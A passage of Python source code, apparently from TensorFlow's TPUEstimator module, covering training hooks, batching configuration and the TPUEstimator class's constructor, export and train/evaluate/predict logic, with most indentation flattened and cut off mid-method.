examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
logging.info('global_step/sec: %g', global_step_per_sec)
logging.info('examples/sec: %g', examples_per_sec)
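# Hedged usage sketch (not part of the original module): attaching the hook
# above to a training call. The estimator, input_fn, and step counts are
# illustrative assumptions.
def _example_attach_examples_per_second_hook(estimator, train_input_fn):
  """Sketch: report examples/sec every 100 steps while training."""
  hook = ExamplesPerSecondHook(
      batch_size=1024,  # Global batch size used to derive examples/sec.
      every_n_steps=100,
      output_dir=estimator.model_dir)
  return estimator.train(input_fn=train_input_fn, hooks=[hook], max_steps=1000)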
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class ExportSavedModelApiVersion(enum.Enum):
V1 = 1
V2 = 2
class BatchConfig(
collections.namedtuple('BatchConfig', [
'num_batch_threads', 'max_batch_size', 'batch_timeout_micros',
'allowed_batch_sizes', 'max_enqueued_batches'
])):
"""Class to handle config inputs into the batching function."""
def __new__(cls,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes,
max_enqueued_batches=10):
"""Creates an BatchConfig instance.
Args:
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op
to pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to
10.
Returns:
      A BatchConfig instance.
"""
return super(BatchConfig, cls).__new__(
cls,
num_batch_threads=num_batch_threads,
max_batch_size=max_batch_size,
batch_timeout_micros=batch_timeout_micros,
allowed_batch_sizes=allowed_batch_sizes,
max_enqueued_batches=max_enqueued_batches)
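# Hedged construction sketch (not part of the original module): the values
# below are illustrative assumptions. Note that the last allowed batch size
# must equal `max_batch_size`, per the docstring above.
def _example_batch_config():
  """Sketch: a BatchConfig suitable for small-batch TPU serving."""
  return BatchConfig(
      num_batch_threads=2,
      max_batch_size=8,
      batch_timeout_micros=5000,
      allowed_batch_sizes=[2, 4, 8])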
@estimator_export(v1=['estimator.tpu.TPUEstimator'])
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. If eval_on_tpu is False, the evaluation will execute on
CPU or GPU; in this case the following discussion on TPU evaluation does not
apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of any nested structure of `Tensor`s (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
        'accuracy': tf.compat.v1.metrics.accuracy(
labels=labels, predictions=predictions),
}
  # Your model Fn which runs on TPU (eval_metrics is a list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
    if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
    if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
  It is not designed for latency-critical systems. In addition, due to some
  usability issues, for prediction with small datasets, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
  data from the generator so that TPUEstimator can shut down the TPU system
  properly for the user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random.uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
  for item in tpu_est.predict(input_fn=predict_input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_saved_model` exports 2 metagraphs, one with `saved_model.SERVING`, and
another with `saved_model.SERVING` and `saved_model.TPU` tags. At serving
time, these tags are used to select the appropriate metagraph to load.
Before running the graph on TPU, the TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If not,
please use `session.run(tpu.initialize_system())`.
There are two versions of the API: ExportSavedModelApiVersion.V1 and V2.
In V1, the exported CPU graph is `model_fn` as it is. The exported TPU graph
wraps `tpu.rewrite()` and `TPUPartitionedCallOp` around `model_fn` so
`model_fn` is on TPU by default. To place ops on CPU,
`tpu.outside_compilation(host_call, logits)` can be used.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
    export_outputs['classes'] = (
        export_output_lib.ClassificationOutput(classes=classes))
tpu.outside_compilation(host_call, logits)
...
```
In V2, `export_saved_model()` sets up `params['use_tpu']` flag to let the user
know if the code is exporting to TPU (or not). When `params['use_tpu']` is
`True`, users need to call `tpu.rewrite()`, `TPUPartitionedCallOp` and/or
`batch_function()`. Alternatively use `inference_on_tpu()` which is a
convenience wrapper of the three.
```
def model_fn(features, labels, mode, config, params):
...
# This could be some pre-processing on CPU like calls to input layer with
# embedding columns.
x2 = features['x'] * 2
def computation(input_tensor):
return layers.dense(
input_tensor, 1, kernel_initializer=init_ops.zeros_initializer())
inputs = [x2]
if params['use_tpu']:
predictions = array_ops.identity(
tpu_estimator.inference_on_tpu(computation, inputs,
num_batch_threads=1, max_batch_size=2, batch_timeout_micros=100),
name='predictions')
else:
predictions = array_ops.identity(
computation(*inputs), name='predictions')
key = signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY
export_outputs = {
key: export_lib.PredictOutput({'prediction': predictions})
}
...
```
TIP: V2 is recommended as it is more flexible (eg: batching, etc).
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
export_to_cpu=True,
warm_start_from=None,
embedding_config_spec=None,
export_saved_model_api_version=ExportSavedModelApiVersion.V1):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
        EstimatorSpec or TPUEstimatorSpec. `training_hooks`, `evaluation_hooks`,
        and `prediction_hooks` must not capture any TPU Tensor inside the
        model_fn.
model_dir: Directory to save model parameters, graph and etc. This can
        also be used to load checkpoints from the directory into an estimator to
        continue training a previously saved model. If `None`, the model_dir in
        `config` will be used if set. If both are set, they must be the same. If
both are `None`, a temporary directory will be used.
config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently, -
TPU training and evaluation respect this bit, but eval_on_tpu can
override execution of eval. See below. - Predict still happens on CPU.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`. Must be divisible by total
number of replicas.
eval_batch_size: An int representing evaluation batch size. Must be
divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size. Must be
divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_saved_model()` exports a metagraph for
serving on TPU. Note that unsupported export modes such as EVAL will be
ignored. For those modes, only a CPU model will be exported.
Currently, export_to_tpu only supports PREDICT.
export_to_cpu: If True, `export_saved_model()` exports a metagraph for
serving on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings` object to fully
configure warm-starting. If the string filepath is provided instead of
a `WarmStartSettings`, then all variables are warm-started, and it is
assumed that vocabularies and Tensor names are unchanged.
embedding_config_spec: Optional EmbeddingConfigSpec instance
to support using TPU embedding.
export_saved_model_api_version: ExportSavedModelApiVersion, V1 or V2.
With V1, `export_saved_model()` adds rewrite() and TPUPartitionedCallOp()
        for the user; while in V2, the user is expected to add rewrite(),
        TPUPartitionedCallOp(), etc. in their model_fn.
A helper function `inference_on_tpu` is provided for V2.
brn_tpu_estimator.py includes examples for both versions
i.e. TPUEstimatorExportTest and TPUEstimatorExportV2Test.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.num_cores_per_replica):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
if embedding_config_spec:
if (config.tpu_config.per_host_input_for_training !=
tpu_config.InputPipelineConfig.PER_HOST_V2):
raise ValueError('Only PER_HOST_V2 is supported when using TPU '
'Embedding; got {}.'.format(
config.tpu_config.per_host_input_for_training))
self._embedding_from_feature_columns = (
embedding_config_spec.feature_columns is not None)
if (not (use_tpu and eval_on_tpu) and embedding_config_spec and
embedding_config_spec.partition_strategy == 'mod'):
raise ValueError('Mod sharding of embedding tables not supported on '
'CPU.')
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to disable TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
    # Pass non-None params, as the wrapped model_fn expects it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = util_lib.parse_iterations_per_loop(
self._config.tpu_config.iterations_per_loop)
# In absence of an explicit `log_every_n_secs` config, if the
# `iterations_per_loop` value is specified as time in seconds, enable
    # logging every n secs based on the `iterations_per_loop` value, as a
    # trade-off to avoid an API change in the current release.
# TODO(henrytan): add `log_every_n_secs` to RunConfig.
if self._iterations_per_training_loop.unit == 'seconds':
self._log_every_n_secs = self._iterations_per_training_loop.value
self._log_every_n_steps = None
elif self._iterations_per_training_loop.unit == 'count':
if self._log_every_n_steps is not None:
# Each session.run() lasts for iterations_per_loop. We can't log
# in-between a session.run(), and we can only log after the
# `iterations_per_loop` steps, so we can only approximate. If a user
# requests to log every N steps, we actually want to roughly log every
# N / `iterations_per_loop` steps to match the original intention.
self._log_every_n_steps = (
int(math.ceil(float(self._log_every_n_steps) /
self._iterations_per_training_loop.value)))
self._log_every_n_secs = None
else:
assert False, ('Invalid TPUConfig `iterations_per_loop` value. '
'Indicates a bug in `iterations_per_loop` '
'parsing.')
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size, eval_batch_size, predict_batch_size,
use_tpu, eval_on_tpu, embedding_config_spec)
self._export_to_cpu = export_to_cpu
self._export_to_tpu = export_to_tpu
if not isinstance(export_saved_model_api_version,
ExportSavedModelApiVersion):
raise ValueError('export_saved_model_api_version should be of type '
'ExportSavedModelApiVersion; got {}.'.format(
export_saved_model_api_version))
self._export_saved_model_api_version = export_saved_model_api_version
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True,
strip_default_attrs=True):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
logging.warning('TPUEstimator only handles mode PREDICT for exporting '
'when `export_to_tpu` is `True`; Mode {} will be ignored '
'for TPU.'.format(mode))
if not self._export_to_cpu and not self._export_to_tpu:
raise ValueError('One of export_to_cpu and export_to_tpu must be true.')
if self._export_to_cpu:
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
if self._export_to_tpu and mode == model_fn_lib.ModeKeys.PREDICT:
input_receiver_fn_map = {
_INFERENCE_ON_TPU_MODE: input_receiver_fn_map[mode]
}
export_tags = [tag_constants.SERVING, tag_constants.TPU]
mode = _INFERENCE_ON_TPU_MODE
# See b/110052256 for why `check_variables` is `False`.
if not self._export_to_cpu:
check_variables = save_variables = True
else:
check_variables = save_variables = False
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
def _call_model_fn(self, features, labels, mode, config):
if self._export_saved_model_api_version == ExportSavedModelApiVersion.V1:
if mode == _INFERENCE_ON_TPU_MODE:
return self._call_model_fn_for_inference(features, labels, mode, config)
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_saved_model`."""
if mode != _INFERENCE_ON_TPU_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_INFERENCE_ON_TPU_MODE, mode))
return model_fn_inference_on_tpu(
self._model_fn,
features,
labels,
config,
self._params,
batch_config=None)
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(
self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
In TPU mode, returns an input_fn to be called later in model_fn.
      Otherwise, calls the input_fn and returns either features or
(features, labels).
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
if (ctx.is_running_on_cpu() and
ctx.is_input_slice_broadcast_to_all_cores()):
raise ValueError('Invalid TPUConfig `eval_training_input_configuration`'
' value. SLICED mode only works on use_tpu = True.')
      # Setting the batch size in params first. This helps the user to have the
      # same input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn)
# For export_saved_model, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
    For TPUEstimator, we do not need to check the result type. `_InputPipeline`
    has a stronger check. The parent class's check generates a confusing
    warning message.
Args:
result: `features` returned by input_fn.
"""
pass
def train(self,
input_fn,
hooks=None,
steps=None,
max_steps=None,
saving_listeners=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('training_loop', sys.exc_info())
finally:
rendezvous.record_done('training_loop')
rendezvous.raise_errors()
def evaluate(self,
input_fn,
steps=None,
hooks=None,
checkpoint_path=None,
name=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('evaluation_loop', sys.exc_info())
finally:
rendezvous.record_done('evaluation_loop')
rendezvous.raise_errors()
def predict(self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error('prediction_loop', sys.exc_info())
finally:
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_saved_model()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if is_export_mode:
if mode == _INFERENCE_ON_TPU_MODE:
_add_item_to_params(params, _USE_TPU_KEY, True)
mode = model_fn_lib.ModeKeys.PREDICT
else:
_add_item_to_params(params, _USE_TPU_KEY, False)
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
# pylint:disable=g-long-ternary
output_dir=(self.model_dir
if not config or config.save_summary_steps
else None),
# pylint:enable=g-long-ternary
every_n_steps=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,))
return estimator_spec
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
tpu_init_ops = []
if ctx.embedding_config and mode == model_fn_lib.ModeKeys.TRAIN:
dummy_table_variables, dummy_table_variables_init = (
tpu_embedding_gradient.create_dummy_table_variables(
ctx.embedding_config.tpu_embedding))
ctx.embedding_config.dummy_table_variables = dummy_table_variables
tpu_init_ops.append(dummy_table_variables_init)
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
compile_op, loss, host_call, scaffold_fn, training_hooks = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
optimization_parameters = (
ctx.embedding_config.tpu_embedding.optimization_parameters)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, slot_variable_names_by_table = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict, optimization_parameters
)
)
else:
embedding_variable_name_by_table = None
slot_variable_names_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table,
slot_variable_names_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
          # scaffold_fn must be called after the variables for TPU embedding have
          # been created on CPU, as the user might reinitialize them from some
          # checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
host_ops = host_call.create_tpu_hostcall()
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'reset_computation')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(),
]
elif shutdown_mode == 'shutdown_all_workers':
finalizer_hooks = [
session_support.ShutdownAllWorkers(),
]
elif shutdown_mode == 'reset_computation':
finalizer_hooks = [
session_support.ResetComputation(),
]
elif not shutdown_mode:
finalizer_hooks = []
else:
raise ValueError(
'Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' % shutdown_mode)
if finalizer_hooks:
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks))
with ops.control_dependencies([loss]):
global_step = array_ops.identity(training.get_global_step())
hooks = input_hooks + shutdown_hooks
hooks.extend([
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops,
outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps),
InstallSignalHandlerHook()
])
if tpu_cluster_resolver.is_running_in_gce():
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
if self._iterations_per_training_loop.unit == 'count':
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
hooks.append(training.LoggingTensorHook(
{
'loss': array_ops.identity(loss),
'step': global_step,
},
every_n_iter=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs))
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps):
checkpoint_hook = training.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold)
if self._iterations_per_training_loop.unit == 'count':
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
else:
# When estimating iterations_per_loop, set steps_per_run to an
# arbitrarily high number to force checking the global step on
# every call.
# TODO(henrytan): refactor SecondOrStepTimer to do this more
# explicitly.
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
100000)
chief_hooks.append(checkpoint_hook)
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops(ctx)
if ctx.embedding_config:
update_ops.extend(embedding_variables_and_ops.retrieve_ops())
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
